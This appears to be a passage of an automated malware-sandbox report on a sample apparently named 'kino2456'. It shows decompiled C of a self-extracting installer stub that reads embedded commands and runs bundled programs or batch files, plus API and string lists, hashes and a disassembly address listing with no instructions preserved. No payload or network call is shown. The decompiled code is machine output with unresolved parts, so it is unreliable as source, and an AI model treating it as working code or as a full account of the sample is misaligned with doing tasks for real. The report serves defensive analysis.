Callgraph (graph image not recoverable from the report text)

Control-flow Graph (graph image not recoverable from the report text)
C-Code - Quality: 82%
E00963BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
	signed char _t145;
	signed int _t149;
	void* _t150;
	void* _t151;
	signed int _t153;
	void* _t155;
	void* _t156;
	signed int _t157;
	signed int _t162;
	signed int _t164;
	void* _t165;

	_t164 = (_t162 & 0xfffffff8) - 0x194;
	_t69 =  *0x968004; // 0xf4cc89a0
	_v8 = _t69 ^ _t164;
	_t153 = 0;
	 *0x969124 =  *0x969124 & 0;
	_t149 = 0;
	_v388 = 0;
	_v384 = 0;
	_t165 =  *0x968a28 - _t153; // 0x0
	if(_t165 != 0) {
		L3:
		_t127 = 0;
		_v392 = 0;
		while(1) {
			_v400 = _v400 & 0x00000000;
			memset( &_v348, 0, 0x44);
			_t164 = _t164 + 0xc;
			_v348 = 0x44;
			if( *0x968c42 != 0) {
				goto L26;
			}
			_t146 =  &_v396;
			_t115 = E0096468F("SHOWWINDOW",  &_v396, 4);
			if(_t115 == 0 || _t115 > 4) {
				L25:
				_t146 = 0x4b1;
				E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
				 *0x969124 = 0x80070714;
				goto L62;
			} else {
				if(_v396 != 1) {
					__eflags = _v396 - 2;
					if(_v396 != 2) {
						_t137 = 3;
						__eflags = _v396 - _t137;
						if(_v396 == _t137) {
							_v304 = 1;
							_v300 = _t137;
						}
                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                                                    										_t76 = E00961AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                                                    											return E00966CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                                                    												_t79 = E00963FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                                                    													_t155 = 1;
                                                                                                                                                                                                                                    													__eflags = 1;
                                                                                                                                                                                                                                    													L69:
                                                                                                                                                                                                                                    													__eflags =  *0x968580;
                                                                                                                                                                                                                                    													if( *0x968580 != 0) {
                                                                                                                                                                                                                                    														E00962267();
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													_t77 = _t155;
                                                                                                                                                                                                                                    													goto L63;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t153 = _v392;
                                                                                                                                                                                                                                    												_t149 = _v388;
                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											L38:
                                                                                                                                                                                                                                    											__eflags =  *0x968180;
                                                                                                                                                                                                                                    											if( *0x968180 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c7;
                                                                                                                                                                                                                                    												E009644B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    												LocalFree(_v424);
                                                                                                                                                                                                                                    												 *0x969124 = 0x8007042b;
                                                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x969a34 & 0x00000004;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												goto L57;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t129 = E00966495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                    											__eflags = _t129;
                                                                                                                                                                                                                                    											if(_t129 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c8;
                                                                                                                                                                                                                                    												E009644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                    												L65:
                                                                                                                                                                                                                                    												LocalFree(_v408);
                                                                                                                                                                                                                                    												 *0x969124 = E00966285();
                                                                                                                                                                                                                                    												goto L62;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                    											_v404 = _t146;
                                                                                                                                                                                                                                    											__eflags = _t146;
                                                                                                                                                                                                                                    											if(_t146 == 0) {
                                                                                                                                                                                                                                    												_t146 = 0x4c9;
                                                                                                                                                                                                                                    												__eflags = 0;
                                                                                                                                                                                                                                    												E009644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                    												FreeLibrary(_t129);
                                                                                                                                                                                                                                    												goto L65;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags =  *0x968a30;
                                                                                                                                                                                                                                    											_t151 = _v408;
                                                                                                                                                                                                                                    											_v384 = 0;
                                                                                                                                                                                                                                    											_v368 =  &_v280;
                                                                                                                                                                                                                                    											_t96 =  *0x969a40; // 0x3
                                                                                                                                                                                                                                    											_v364 = _t96;
                                                                                                                                                                                                                                    											_t97 =  *0x968a38 & 0x0000ffff;
											_v380 = 0x969154;
											_v376 = _t151;
											_v372 = 0x9691e4;
											_v360 = _t97;
											if( *0x968a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x969a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x968d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x969a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x96a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x969124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x969a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x968a20;
										if( *0x968a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0096202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0096468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x968c42;
									if( *0x968c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x968a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0096468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0096468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00961781( &_v276, 0x104, _t130, 0x968c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0096468F(_t130, 0x969a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
Disassembly listing for the code range 0x00963baa to 0x00963fe8 (address column only; the instruction mnemonics and operands were not preserved in this extraction, and entries shown as 0x00000000 mark rows the report left unresolved).
                                                                                                                                                                                                                                    0x00963f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f76
                                                                                                                                                                                                                                    0x00963e3c
                                                                                                                                                                                                                                    0x00963e43
                                                                                                                                                                                                                                    0x00963e47
                                                                                                                                                                                                                                    0x00963e52
                                                                                                                                                                                                                                    0x00963e56
                                                                                                                                                                                                                                    0x00963e5c
                                                                                                                                                                                                                                    0x00963e61
                                                                                                                                                                                                                                    0x00963e68
                                                                                                                                                                                                                                    0x00963e70
                                                                                                                                                                                                                                    0x00963e74
                                                                                                                                                                                                                                    0x00963e7c
                                                                                                                                                                                                                                    0x00963e80
                                                                                                                                                                                                                                    0x00963e82
                                                                                                                                                                                                                                    0x00963e82
                                                                                                                                                                                                                                    0x00963e87
                                                                                                                                                                                                                                    0x00963e87
                                                                                                                                                                                                                                    0x00963e8b
                                                                                                                                                                                                                                    0x00963e91
                                                                                                                                                                                                                                    0x00963e94
                                                                                                                                                                                                                                    0x00963e96
                                                                                                                                                                                                                                    0x00963e96
                                                                                                                                                                                                                                    0x00963e9b
                                                                                                                                                                                                                                    0x00963e9b
                                                                                                                                                                                                                                    0x00963e9f
                                                                                                                                                                                                                                    0x00963ea2
                                                                                                                                                                                                                                    0x00963ea4
                                                                                                                                                                                                                                    0x00963ea4
                                                                                                                                                                                                                                    0x00963ea9
                                                                                                                                                                                                                                    0x00963ea9
                                                                                                                                                                                                                                    0x00963ead
                                                                                                                                                                                                                                    0x00963eb3
                                                                                                                                                                                                                                    0x00963eb6
                                                                                                                                                                                                                                    0x00963eb8
                                                                                                                                                                                                                                    0x00963eb8
                                                                                                                                                                                                                                    0x00963ebd
                                                                                                                                                                                                                                    0x00963ebd
                                                                                                                                                                                                                                    0x00963ec1
                                                                                                                                                                                                                                    0x00963ec3
                                                                                                                                                                                                                                    0x00963ec5
                                                                                                                                                                                                                                    0x00963ec5
                                                                                                                                                                                                                                    0x00963eca
                                                                                                                                                                                                                                    0x00963eca
                                                                                                                                                                                                                                    0x00963ece
                                                                                                                                                                                                                                    0x00963ed5
                                                                                                                                                                                                                                    0x00963ed9
                                                                                                                                                                                                                                    0x00963ee0
                                                                                                                                                                                                                                    0x00963ee6
                                                                                                                                                                                                                                    0x00963eea
                                                                                                                                                                                                                                    0x00963eec
                                                                                                                                                                                                                                    0x00963eee
                                                                                                                                                                                                                                    0x00963ef3
                                                                                                                                                                                                                                    0x00963ef3
                                                                                                                                                                                                                                    0x00963ef5
                                                                                                                                                                                                                                    0x00963efa
                                                                                                                                                                                                                                    0x00963efb
                                                                                                                                                                                                                                    0x00963efd
                                                                                                                                                                                                                                    0x00963f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963eff
                                                                                                                                                                                                                                    0x00963eff
                                                                                                                                                                                                                                    0x00963f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963f05
                                                                                                                                                                                                                                    0x00963efd
                                                                                                                                                                                                                                    0x00963dc7
                                                                                                                                                                                                                                    0x00963dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963dd0
                                                                                                                                                                                                                                    0x00963dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963dd9
                                                                                                                                                                                                                                    0x00963ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963ddd
                                                                                                                                                                                                                                    0x00963de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963de1
                                                                                                                                                                                                                                    0x00963d59
                                                                                                                                                                                                                                    0x00963d65
                                                                                                                                                                                                                                    0x00963d6a
                                                                                                                                                                                                                                    0x00963d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d6e
                                                                                                                                                                                                                                    0x00963d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d8f
                                                                                                                                                                                                                                    0x00963d96
                                                                                                                                                                                                                                    0x00963d98
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d98
                                                                                                                                                                                                                                    0x00963c8f
                                                                                                                                                                                                                                    0x00963c98
                                                                                                                                                                                                                                    0x00963cf1
                                                                                                                                                                                                                                    0x00963cf3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963cfe
                                                                                                                                                                                                                                    0x00963d11
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963d11
                                                                                                                                                                                                                                    0x00963c9c
                                                                                                                                                                                                                                    0x00963ca5
                                                                                                                                                                                                                                    0x00963ca7
                                                                                                                                                                                                                                    0x00000000
0x00000000
0x00963cad
0x00963cb2
0x00963cb7
0x00963cc5
0x00000000
0x00000000
0x00963ce8
0x00963cec
0x00963ced
0x00963ced
0x00000000
0x00963ce8
0x00963c9e
0x00000000
0x00963c9e
0x00963c56
0x00963d35
0x00963d35
0x00963d3c
0x00963d48
0x00000000
0x00963d48
0x00963c03
0x00963be2
0x00963be7
0x00963bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs
• memset.MSVCRT ref: 00963C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00963CDC
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
  • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
  • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
  • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
  • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
  • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
  • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00968C42), ref: 00963D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00963E26
• FreeLibrary.KERNEL32(00000000,?,00968C42), ref: 00963EFF
• LocalFree.KERNEL32(?,?,?,?,00968C42), ref: 00963F1F
• FreeLibrary.KERNEL32(00000000,?,00968C42), ref: 00963F40
• LocalFree.KERNEL32(?,?,?,?,00968C42), ref: 00963F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00968C42), ref: 00963F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00968C42), ref: 00963F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00968C42), ref: 00963FC2
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
• API String ID: 1032054927-4103600427
• Opcode ID: ba83180e44ac5c767d0792f2985d4056bfc0fe7154a5266e39f3187bb638c51d
• Instruction ID: d3e5485858fc969c5934d60fe70921061a485170675aee01163dbda4d782f5e4
• Opcode Fuzzy Hash: ba83180e44ac5c767d0792f2985d4056bfc0fe7154a5266e39f3187bb638c51d
• Instruction Fuzzy Hash: B8B122709183019FE730DF64C855B2B77E8EB85700F108A2EFA95D21D1DBB4CA40DBA2
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
control_flow_graph 141 961ae8-961b2c call 961680 144 961b2e-961b39 141->144 145 961b3b-961b40 141->145 146 961b46-961b61 call 961a84 144->146 145->146 149 961b63-961b65 146->149 150 961b9f-961bc2 call 961781 call 96658a 146->150 152 961b68-961b6d 149->152 157 961bc7-961bd3 call 9666c8 150->157 152->152 154 961b6f-961b74 152->154 154->150 156 961b76-961b7b 154->156 158 961b83-961b86 156->158 159 961b7d-961b81 156->159 165 961d73-961d7f call 9666c8 157->165 166 961bd9-961bf1 CompareStringA 157->166 158->150 162 961b88-961b8a 158->162 159->158 161 961b8c-961b9d call 961680 159->161 161->157 162->150 162->161 175 961d81-961d99 CompareStringA 165->175 176 961df8-961e09 LocalAlloc 165->176 166->165 168 961bf7-961c07 GetFileAttributesA 166->168 170 961d53-961d5e 168->170 171 961c0d-961c15 168->171 173 961d64-961d6e call 9644b9 170->173 171->170 174 961c1b-961c33 call 961a84 171->174 188 961e94-961ea4 call 966ce0 173->188 190 961c35-961c38 174->190 191 961c50-961c61 LocalAlloc 174->191 175->176 181 961d9b-961da2 175->181 178 961dd4-961ddf 176->178 179 961e0b-961e1b GetFileAttributesA 176->179 178->173 183 961e67-961e73 call 961680 179->183 184 961e1d-961e1f 179->184 186 961da5-961daa 181->186 194 961e78-961e84 call 962aac 183->194 184->183 189 961e21-961e3e call 961781 184->189 186->186 192 961dac-961db4 186->192 189->194 211 961e40-961e43 189->211 197 961c40-961c4b call 961a84 190->197 198 961c3a 190->198 191->178 193 961c67-961c72 191->193 199 961db7-961dbc 192->199 200 961c74 193->200 201 961c79-961cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->201 210 961e89-961e92 194->210 197->191 198->197 199->199 206 961dbe-961dd2 LocalAlloc 199->206 200->201 208 961cc2-961ccc 201->208 209 961cf8-961d07 201->209 206->178 207 961de1-961df3 call 96171e 206->207 207->210 213 961cd3-961cf3 call 961680 * 2 208->213 214 961cce 208->214 216 961d23 209->216 217 961d09-961d21 GetShortPathNameA 209->217 210->188 211->194 215 961e45-961e65 call 9616b3 * 2 211->215 213->210 214->213 215->194 221 961d28-961d2b 216->221 217->221 224 961d32-961d4e call 96171e 221->224 225 961d2d 221->225 224->210 225->224
C-Code - Quality: 82%
E00961AE8(long __ecx, CHAR** _a4, int* _a8) {
	signed int _v8;
	char _v268;
	char _v527;
	char _v528;
	char _v1552;
	CHAR* _v1556;
	int* _v1560;
	CHAR** _v1564;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t48;
	CHAR* _t53;
	CHAR* _t54;
	char* _t57;
	char* _t58;
	CHAR* _t60;
	void* _t62;
	signed char _t65;
	intOrPtr _t76;
	intOrPtr _t77;
	unsigned int _t85;
	CHAR* _t90;
	CHAR* _t92;
	char _t105;
	char _t106;
	CHAR** _t111;
	CHAR* _t115;
	intOrPtr* _t125;
	void* _t126;
	CHAR* _t132;
	CHAR* _t135;
	void* _t138;
	void* _t139;
	void* _t145;
	intOrPtr* _t146;
	char* _t148;
	CHAR* _t151;
	void* _t152;
	CHAR* _t155;
	CHAR* _t156;
	void* _t157;
	signed int _t158;

	_t48 =  *0x968004; // 0xf4cc89a0
	_v8 = _t48 ^ _t158;
	_t108 = __ecx;
	_v1564 = _a4;
	_v1560 = _a8;
	E00961680( &_v528, 0x104, __ecx);
	if(_v528 != 0x22) {
		_t135 = " ";
		_t53 =  &_v528;
	} else {
		_t135 = "\"";
		_t53 =  &_v527;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                                                    				_t54 = E00961A84(_t111, _t135);
                                                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                                                    					E00961781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                    					E0096658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						E00961680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                                                    						_t57 = E009666C8(_t156, _t138);
                                                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                                                    							_t58 = E009666C8(_t115, _t139);
                                                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                    									E00961680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                                                    									E00961781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                    										E009616B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                    										E009616B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                                                    								E00962AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                                                    									E0096171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                                                    								_t90 = E00961A84( &_v1556, "[");
                                                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                                                    									}
